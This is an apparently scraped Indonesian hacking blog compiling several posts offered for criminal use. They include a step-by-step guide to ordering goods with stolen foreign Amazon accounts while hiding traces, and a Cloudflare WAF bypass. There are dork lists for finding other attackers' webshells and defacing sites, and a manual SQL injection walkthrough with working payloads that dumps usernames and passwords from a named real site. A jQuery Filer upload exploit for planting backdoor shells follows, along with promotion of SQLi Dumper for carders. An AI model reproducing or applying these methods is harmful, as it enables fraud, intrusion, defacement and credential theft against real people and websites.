Hallo guys kali ini saya akan membagikan toturial CO amazon pasti BERHASIL!!

LANGSUNG KE TKP GUYS!!


1. Hapus data cahce chrome/ mozzila kalian sampai bersih
2. Setting pengaturan jam nya sesuai gmt negara yang di akun
3. Idupin VPN sesuai negara akun
4. Kalau sudah konek buka chorme / mozila ketik " check2ip,com "
5. Kalau jam nya cocok + ada tulisan ok berwarna hijau berati akurat
6. Buka tab baru lalu ketik whoer,net ( kalau udah 90% ) close saja chorme / mozzila nya
NB : kalau belum usahakan terus sampe 90%
7. Sekarang login di email nya bule
Kalau email nya
Free,fr login nya di webmail,free,fr
Orange.fr login nya di webmail,orange,fr
Tergantung akun si bula
8. Kalau sudah login ke email dasar nya sekarang buka amazon ( sesua country negara kalian )
9. Kalau sudah login Dan minta verif kode cek di email dasar nya lalu copy Dan paste di amazon nya
10. Kalau sudah login Cari seller kesayangan kalian lalu CO sampe selesai
11. Kalau sudah selesai CO hapus history order di email dasar nya ( hapus permanent )
12. Kalau sudah logout akun amazon nya
Dan close chorme / mozzila
13. Kalau sudah hapus data chorme /mozila nya lagi
14. Kalau sudah matiin VPN
15. Login lagi 3-4 jam kemudian
16. Kalau sudah 4 jam waktu nya login lg cek preaper gak nya
17. Hapus data chorme / mozila dulu
18. Idupin VPN lg kalau udah
19. Buka email dasar si bule lagi
20.kalau sudah login email dasar buka amazon nya lagi ( sesuai negara masing masing )
21. Kalau sudah login Dan verif kode ambil di email dasar seperti biasa
22. Cek bagian orderan
23. Kalau sudah preaper ? Cukup ganti email 1 Kali ( password jangan )
24. Kalau udah masuk ke email dasar bule ( hapus semua history tentang amazon di email hapus permanent )
25. Kalau sudah back amazon lalu CS deh
26. Rayuan ? Hayo yang Jago rayu pasti seller mau change ke indo
27. Kalau sudah cs terus logout lalu close chorme / Mozilla
28. Kalau sudah hapus data lg chorme / mozila nya
29. Matiin VPN
30. Tinggal tunggu balesan email dari seller
NB :
- KALAU BISA CO PAS DI LUAR NEGRI TENGAH MALAM
- CS JANGAN PAKE KATA GIFT / HADIAH / ANAK / SAUDARA ( OTOMATIS SELLER UDAH NEBAK INI PEMBAJAKAN )
CO JANGAN SABTU DAN MINGGU
CO 1 AKUN CUKUP 1 ITEM
VPN GRATISAN DI SARAN KAN
VYRVPN
TUNNELBEAR
VPN BERBAYAR
IP VANISH
NORD
EXPRES
=======================================================================================================
Method cari seller amazon
- donwlaod wechat & whatshaap
- buka yopmail.com
- klik random email
- copy email nya
- masuk ke amazon yang kalian mau eksekusi
- buat akun nya pake email ( nama nya jangan nama ngasal imajinasi dikit nama nama bule )
- cari barang NON PRIME
- buka tab ke barang yang NON prime
- ship by " jenson007 " nah yang nama jenson klik masuk ke bagian profiel seller
- terus klik ask a Question
- pilih kategori shipping
- masukin rayuan kalian
- terus kirim pesan
- spam terus 1 per 1 gak usah peduliin harga / model barang nya buka in 1 1 aja itu yang NON prime lalu CS
NB : kalau ada nomor si seller copy lalu paste di wechat / whatshaap
itu lebih cepet di bales
-  CS pas di luar negri pagi hari biar cepet di bales
- GAK USAH PAKE VPN
- kalau ada yang mau ke indo balas pesan nya
- can you give me your link store
- kalau udah di kasih nanti kalian klik lalu pilih2 barang

SEMOGA SUKSES CO NYA!!!
loading...

Method CO Amazon 2019 Terbaru !!!

Posted by : A3 Team 0 Comments

GATHERING INFORMATION

Ini adalah proses pertama yang harus dilakukan. Pertama kali yang saya dan teman saya lakukan adalah mencari tau CMS apa yang digunakan website tersebut dan list subdomain yang aktif dan bisa diakses. Karena domain utamanya hanyalah sebuah website yang menggunakan blogger, kemudian kami menemukan 1 buah subdomain yang menggunakan suatu CMS yang familiar dan kelihatannya tak lagi ter-urus.
Untuk mulai melakukan scanning, hal pertama kali yang harus kami lakukan adalah menemukan “Real IP” server yang digunakan. Saat itu websiteini menggunakan cloudflare dan juga sudah mengaktifkan CloudFlare WAF (Web application firewall). Jadi otomatis untuk setiap request akan melewati Cloudflare terlebih dahulu.

MENCARI TAU IP SESUNGGUHNYA YANG DIGUNAKAN

Untuk mencari tau IP sesunggunya yang digunakan kita bisa menggunakan “dns record history“. Tool ini nantinya akan memberikan kita daftar dns yang pernah digunakan oleh suatu domain. Untuk mencari tau dns historical databisa menggunakan https://securitytrails.com/.

Itu adalah contoh IP sesungguhnya yang digunakan oleh Bukan Coder bisa diketahui dari dns historical data atau dns record history.  103.200.4.11 adalah IP sesungguhnya yang digunakan oleh Bukan Coder, dan ketika diakses, gotchaaa

BYPASS CLOUDFLARE WAF

Karena disini kita sudah mengetahui IP sesungguhnya yang digunakan maka kita bisa langsung mengganti Hosts File, agar setiap request langsung ke IP tersebut, tidak lagi melewati Cloudflare
Lokasi Hosts File :
Pengguna Windows : c:\windows\system32\drivers\etc\hosts
Pengguna Linux : /etc/hosts
Karena ketika menulis artikel ini saya sedang menggunakan Windows, maka berikut cara untuk mengganti file hosts di Windows. Klik menu start – Ketik Run dan paste text berikut ini



Kemudian tambahkan line IP dan website yang ingin di bypass. Maka hasilnya akan seperti ini

PERCOBAAN UNTUK MEMASTIKAN CARA INI EFEKTIF ATAU TIDAK

Sebelum melakukan percobaan ini saya akan mengembalikan file hosts seperti semula, dan ketika melakukan request hasilnya akan seperti ini :

Setelah itu saya akan kembali mengganti file hosts agar setiap request langsung ke IP sesungguhnya yang berada dibalik CloudFlare. Berikut hasilnya

Jadi untuk sekedar melewati WAF dari CloudFlare bukanlah sesuatu yang sulit jika kita sudah mengetahui IP sesungguhnya yang digunakan oleh suatu website. Jadi bisa disimpulkan juga jika menggunakan 1 WAF masih belum cukup jika hanya mengandalkan CloudFlare.
Sekian dari saya dan semoga bermanfaat.
Terima kasih
Salam,
Teguh Aprianto

Sumber : https://bukancoder.co/menemukan-ip-dibalik-cloudflare-dan-bypass-waf-by-cloudflare/
loading...

MENEMUKAN IP DIBALIK CLOUDFLARE DAN BYPASS WAF BY CLOUDFLARE

Posted by : A3 Team 0 Comments
Oke gayn..
Kali ini gue bakalan ngasih tutorial Deface metode dorking shell / Nikung :''v mwehehehe :"v

Oh iya sebelumnya gue mau ngucapin SELAMAT ULANG TAHUN BUAT CACA MEMBER SEKALIGUS ADIK GUE (ADIK KETEMU GEDE :V) Wish You All The Best :)


Oke back to topic :'v

Oh iya, kalian yang belum tau apa itu deface sekarang gue kasih tau.

Apa itu deface?

serangan terhadap situs web yang mengubah tampilan visual situs atau halaman web.

Oke gak usah banyak cingcong lagi :"v

Bahan bahan yang dipakai :

- Rokok
- Kopi
(Kedua diatas biar fresh :''v)
- Pc/Hp
- Internet
- Dork.

Dan disini gue udah ngumpulin beberapa dorknya.

Dork:intitle:"IndoXploit" filetype:php 
intitle:"IndoXploit" intext:"public_html" filetype:php
intitle:"IndoXploit" intext:"mass deface" filetype:php
intitle:"IndoXploit" intext:"mass delete" filetype:php
intitle:"IndoXploit" intext:"jumping" filetype:php
intitle:"IndoXploit" intext:"config" filetype:php
intitle:"IndoXploit" intext:"config" filetype:php
intitle:"IndoXploit" intext:"fake root" filetype:php
intitle:"IndoXploit" intext:"auto edit user" filetype:php
intitle:"IndoXploit" intext:"Auto Edit Title WordPress" filetype:php
intitle:"IndoXploit" intext:"WordPress Auto Deface" filetype:php
intitle:"IndoXploit" intext:"WordPress Auto Deface V.2" filetype:php
intitle:"IndoXploit" intext:"CPanel/FTP Auto Deface" filetype:php
intitle:"IndoXploit" intext:"cpanel crack" filetype:php
intitle:"IndoXploit" intext:"Adminer" filetype:php
intitle:"IndoXploit" intext:"SMTP Grabber" filetype:php
intitle:"IndoXploit" intext:"Zone-h" filetype:php
intitle:"IndoXploit" intext:"CGI Telnet" filetype:php
intitle:"IndoXploit" intext:"network" filetype:php
intitle:"IndoXploit" intext:"K-RDP Shell " filetype:php
intitle:"IndoXploit" intext:"newfile | newfolder" filetype:php
inurl:"/wp-content/" intitle:"IndoXploit" filetype:php
inurl:"/wp-content/" intitle:"b374k" filetype:php
inurl:"/wp-content/" intitle:"b374k m1n1" filetype:php
inurl:"/wp-content/" intitle:"Shell" filetype:php
inurl:"/wp-content/" intitle:"Stupidc0de" filetype:php
intitle:"1n73ction" filetype:php 
intext:"Cpanel Cracker" filetype:php
intext:"Current DIR: /home/" filetype:php
intext:"IndoXploit" filetype:php
inurl:.php.fla
"config root man" "Current Path :"
"Man Man " "gif89a"
"Server IP :" "Disable Functions: NONE" "Summoner Tools"
intitle:"B Ge Team File Manager"
intitle:"$$ Beby $$" ext:php
"Da3s HaCkEr File Manager" "Current Path :" "Upload File :"
Man Man " "gif89a"
"Server IP :" "Disable Functions: NONE" "Summoner Tools"
"4LV1N_404 - Copyright 2k17"
"4LV1N_404 Shell" "Path :" "File Upload :"
"Websites :" "Current DIR:" "Disable Functions:"
"software :" "safe mode" "Disabled Functions: NONE" "User :"
"Kernel Info:" "Search:" ".: COMMANDS PANEL :."
(Kembangin lagi dengan otak s3k5 kalian :""""v)

Bagaimana caranya?

1. Seduh kopinya :'v
2. Bakar rokoknya :''v
3. Open pc/hp lo
4. Nyalahin data/wifi :"""v
5. Buka crome/mozila
6. Dan dorking dengan dork diatas..
7. Pilih site
8. Cari public_html
9. Pastekan script deface lo di index.php

Note : Kalo mau nebas index jangan lupa di backup dulu ya asu, Kasian adminnya, dan untuk jadi admin web itu gak gampang >:(
loading...

Tutorial deface metode dorking shell

Posted by : A3 Team 0 Comments
http://gilacoders.zone.id

Pada Tutorial Kali ini ,Saya akan Share Tutorial Deface Sql Manual di Android, Nah Buat User Android Jangan Pernah Menyerah Bro, Karena Gak Cuman di Pc Yang Bsa Sql Sql ,Karena Bantuan HackBar Wkwkwkwk.Nah Pertama Silahkan Kalian Dorking Aja Dulu, Sampai Menemukan Site Yang Mempunyai Vuln Sql .
dork : 
- inurl:/staff.php?id=
- inurl:/news.php?id=
kembangin sendiri gan.

Nah Langsung Aja Karena Saya Udah Nemu Situs Yang Vuln Sql ,Oh iya Untuk Mengetahui Vuln Atau Tidak Kalian Hanya Perlu Masukan tanda ( ' ) di belakang angka Id nya, Contoh :
http://www.jjhobby.com/viewproduct.php?id=9' Nah Kek gitu deh, maka muncul You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1


jika sudah ketemu ,kalian tinggal masukan +order+by+1--+- ,Jadinya :
http://www.jjhobby.com/viewproduct.php?id=9+order+by+1--+-
Kalian Terusin Sampai Ketemu Error ,jadinya
http://www.jjhobby.com/viewproduct.php?id=9+order+by+1--+- => Ga error
http://www.jjhobby.com/viewproduct.php?id=9+order+by+2--+- Ga error
http://www.jjhobby.com/viewproduct.php?id=9+order+by+3--+- Ga error 
Sampai eror ya gan, 

http://gilacoders.zone.id



Nah disini saya eror di http://www.jjhobby.com/viewproduct.php?id=9+order+by+11--+- Maka di Pastikan Table nya ada 10, Jika Sudah Gitu Kalian Tinggal ganti +order+by dengan +union+select,jangan lupa di kasih tanda (-) di depan angka id.

http://gilacoders.zone.id

jadinya : http://www.jjhobby.com/viewproduct.php?id=-9+union+select+3--+- karena tadi table nya ada 10 jadinya http://www.jjhobby.com/viewproduct.php?id=-9+union+select+1,2,3,4,5,6,7,8,9,10--+- .Maka Akan Terlihat angka Ajaib Nya.



Saya akan pilih Angka Dua Aja Biar Mesra wkwkwk.Sekarang Kita masukan inject nya .
inject : (select(@x)from(select(@x:=0x00),(select(0)from(information_schema.columns)where(table_schema=database())and(0x00)in(@x:=concat+(@x,0x3c62723e,table_name,0x203a3a20,column_name))))x)
Masukan Pas di angka yang muncul Tadi ,

Jadinya : http://www.jjhobby.com/viewproduct.php?id=-9+union+select+1,(select(@x)from(select(@x:=0x00),(select(0)from(information_schema.columns)where(table_schema=database())and(0x00)in(@x:=concat+(@x,0x3c62723e,table_name,0x203a3a20,column_name))))x),3,4,5,6,7,8,9,10--+- Nah Disini Kalian Akan Lihat Banyak Table Table, Carilah Table Yang ada username dan password nya, kalo gak admin.


Nah Jika Sudah Lihat, Kalian Tinggal Dump istilahnya, Atau Buka Table Caranya Dengan Masukan Inject : /*!50000(SELECT+GROUP_CONCAT(username,0x3a,password+SEPARATOR+0x3c62723e)+FROM+utenti)*/ ,

Disini user dan password saya di Table securityTab.dan nama table adminnya user_id. dan asswordnya user_pw. Jadi kalian edit inject nya jadi : /*!50000(SELECT+GROUP_CONCAT([user_id],0x3a,[user_pw]+SEPARATOR+0x3c62723e)+FROM+[securityTab])*/
Yang Saya Tandai [ ] Yang Harus Kalian Ganti.

Maka Jadinya : http://www.jjhobby.com/viewproduct.php?id=-9+union+select+1,/*!50000(SELECT+GROUP_CONCAT(user_id,0x3a,user_pw+SEPARATOR+0x3c62723e)+FROM+securityTab)*/,3,4,5,6,7,8,9,10--+-
Nanti Saat Kalian Buka ,Akan Muncul user + password .


Tinggal Kalian Cari Login Page Nya ,Wkwkwkwk.
Ez bukan?


loading...

Cara Deface Sql Manual di Android

Posted by : A3 Team 0 Comments
kali ini saya ingin berbagi cara mencari kelemahan sebuah website hanya melalui hp android saja, yang di bantu dengan aplikasi termux.

Awalnya saya sempat pikir, kalau mau mencari kelemahan website itu perlu komputer yang di install linux segala macem, tapi saya gak sadar kalau basis android ini adalah linux juga, maka dari itu pasti bisa di manfaatkan.

Ternyata benar saja, hanya dengan bermodalkan termux pun, kelemahan website bisa di temukan 😁😂.

Dan caranya itu dengan menggunakan package RED_HAWK.

Sebenarnya, package tersebut sudah saya singgung di part sebelumnya, dan bagi sobat yang baca dengan teliti, pasti sobat sudah bisa menebak package yang akan saya gunakan 😁😁😁.

"Lalu, gimana caranya bang ?"

Nah, sebelum saya mulai menjelaskan caranya, pertama pastikan beberapa hal di bawah ini dulu :
  1. Hp sudah terpasang Termux sekaligus sudah terpasang juga bahasa PHP, serta Package Redhawk di dalamnya.
  2. Sudah memiliki link website yang akan menjadi target, link target saya : hack-yourself-first.com/.
Kalau sobat gak ada link target, pake link di atas saja, soalnya link di atas itu khusus untuk belajar hacking.

Btw thanks buat http://cuman-android.blogspot.com/2018/08/cara-menggunakan-termux-untuk-pemula-part-3.html?m=1

Oke lanjut..

Cara Mencari Kelemahan sebuah website hanya bermodalkan hp Android - Termux

1. Buka termux, kemudian buka folder RED_HAWK, caranya itu seperti ini :

Ketikan perintah :

ls

kemudian enter, lalu di lanjutkan dengan mengetikan perintah :

cd RED_HAWK

Kemudian enter lagi.

2. Lalu, kita bisa langsung menjalankan program rhawk.phpnya.

Caranya itu ketikan perintah :

php rhawk.php

(pastikan tulisannya sudah berwarna hijau, jika belum masukan perintah chmod +x rhawk.php).

3. Maka, akan terbukalah halaman depan RED_HAWKnya, dan selanjutnya sobat bisa memasukan link targetnya (tanpa HTTP/HTTPS), lalu enter dan untuk http/httpsnya harap di sesuaikan dulu, kalau webnya pake http pilih 1, kalau https pilih 2.
Cara Menggunakan Termux untuk Pemula, Part 3 : Mencari Kelemahan sebuah website hanya bermodalkan hp Android - Tanpa Root

4. Jika sudah, nanti akan muncul banyak sekali menu yang bisa kita memanfaatkan, dan karena saya hanya ingin lihat kelemahan websitenya saja, jadi saya pilih nomor 9, jika sudah ketikan 9 lalu enter.

5. Kemudian akan muncul penggalan URL yang merupakan kelemahan dari website si target, jika yang muncul not vulnerable, berarti belum ada celah.

Cara Menggunakan Termux untuk Pemula, Part 3 : Mencari Kelemahan sebuah website hanya bermodalkan hp Android - Tanpa Root

6. Nah selanjutnya, sobat bisa menggunakan link tersebut untuk mengakses database dari website si target, tapi saya tidak ingin membahasnya, karena itu termasuk tutorial untuk seorang yang sudah advanced.

Keterangan menu di RED_HAWK :

#1. Basic recon :

Untuk mencari informasi umum sebuah website, contohnya ip, judul web, robot.txt, dan cms.

#2. Whois lookup :

Untuk melihat informasi “orang” yang ada di balik layar.

#3. Geo IP Lookup :

Di gunakan untuk mencari alamat ip secara lengkap, mulai dari negara, kota, hingga latitude, dan longitude.

#4. Grab Banners :

Di gunakan untuk mengambil informasi yang ada pada “banner”, biasanya berisi XSS - Protection, dan Vary.

#5. DNS Lookup :

Untuk melihat informasi dns.

#6. Subnet Calculator :

Melihat informasi subnet dengan membagi ip net menjadi sub net.

#7. NMAP Port Scan :

Di gunakan untuk melihat informasi network map yang ada pada website target.

#8. Subdomain Scanner :

Untuk melihat informasi dari subdomain.

#9. Reverses ip lookup & CMS Detection :

Untuk mengecek apakah websitre tersebut menggunakan pembalikan ip, serta cms.

#10. SQL Scanner :

Untuk mengecek SQL VS, kelemahan website.

#11. Crawler :

Berfungsi untuk mengcrawl url yang ada di website.

#12. MX lookup 

#13. Scan for everything 

Berfungsi untuk melihat informasi sebuah website secara keseluruhan, ini adalah gabungan dari nomor 0-13.

Thanks :*
loading...

Tutorial Mencari Kelemahan Website Via Termux Android

Posted by : A3 Team 0 Comments
Oke gayn.. kali ini gue mau buat tutorial deface metode jQuery Filer..

Bahan yang di perlukan

- dork : inurl:/plugins/jquery.filer (kembangin lagi)
- exploit : php/upload.php (Taro exploit dibelakang /jquery.filer)
- CSRF > Touch Me Senpai :*
- Shell backdoor (Kalo belum ada bisa cari aja di gugel banyak gosah manja :'v)
- Script deface

Caranya :

1. Dorking dengan dork diatas
2. Masukin exploitnya gayn..
3. Kalo tampilannya Blank berarti vuln
4. Kalo udah, masukin link target beserta exploitnya ke dalam CSRF online. Isi post file dengan files[] (Link di atas)
5. Upload shell backdoor
6. Jika sudah di upload, tinggal akses aja

Aksesnya?
Tinggal ganti php/upload.php tadi jadi uploads/files/namaShell.php

Note: Kalo mau nebas Index, jangan lupa di backup dulu index nya

sekian dari gue..

Thanks :*
loading...

Tutorial Deface Metode jQuery Filer

Posted by : A3 Team 0 Comments


Apa itu SQLi Dumper?
SQLi Dumper adalah program yang biasa di gunakan oleh para Carder untuk mengambil data data yang berada di situs Jual Beli.

Untuk mendapatkan program tersebut bisa download Disini , Disitu , atau Disono

Tag :

Download SQLi Dumper New Version
Download SQLi Dumper New
Download SQLi 2019
Download SQLi Dumper
SQLi Dumper versi terbaru

loading...

SQLi Dumper v.9.8.4 New 2019

Posted by : A3 Team 0 Comments

- Copyright © A3 TEAM - Blogger Templates - Powered by Blogger - Designed by Johanes Djogan -